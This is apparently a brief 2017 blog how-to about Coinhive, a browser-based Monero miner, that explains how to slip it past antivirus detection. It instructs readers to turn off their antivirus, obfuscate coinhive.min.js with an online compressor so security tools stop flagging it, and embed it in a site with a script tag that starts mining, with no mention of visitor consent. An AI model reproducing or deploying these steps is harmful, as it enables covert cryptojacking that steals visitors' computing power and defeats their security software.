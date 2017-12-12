What is Coinhive?

The JavaScript code that mining the Monero in the background. The site operator may place it on the page as a new type of revenue that stems from the use of the visitor PC’s computer capacity.

Bases problem – blocking antivirus js code from “https://coinhive.com/lib/coinhive.min.js”

The solution to the problem is simple. Just download the JavaScript from “https://coinhive.com/lib/coinhive.min.js” and use JavaScript compressor. The resulting compressed code will be smaller and antivirus will block anything. For example https://jscompress.com.

Approach:

1. turn off the antivirus

2. download from “https://coinhive.com/lib/coinhive.min.js” to disk

3. open https://jscompress.com and compress the code

4. then put on your site:

<script src=”INSERT COMPRESS JS CODE”></script>

<script>

var miner = new CoinHive.Anonymous (‘YOUR ID’);

miner.start ();

</script>

Source: coinhive.com